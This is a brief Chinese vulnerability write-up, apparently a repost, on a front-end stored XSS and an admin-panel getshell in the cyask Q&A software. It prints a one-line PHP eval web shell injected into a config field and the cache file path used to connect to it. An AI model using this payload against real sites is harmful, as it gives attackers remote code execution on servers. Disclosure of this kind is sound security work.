cyask 前台xss与后台Getshell

没穿底裤 2019年12月31日21:56:36评论530 views字数 141阅读0分28秒阅读模式
摘要

by 0day5_saline
首先是注册一枚

然后查看会员资料,发现xss已经成功的触发了

by 0day5_saline
首先是注册一枚
cyask 前台xss与后台Getshell
然后查看会员资料,发现xss已经成功的触发了
cyask 前台xss与后台Getshell

cyask 前台xss与后台Getshell
关于后台拿shell,在配置文件出插入
[php]';eval($_POST[c]);//[/php]
经过检查,只能插入四处
cyask 前台xss与后台Getshell
插入后连接
askdata/cache/cache_variable.php

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日21:56:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cyask 前台xss与后台Getshellhttp://cn-sec.com/archives/75408.html

发表评论

匿名网友 填写信息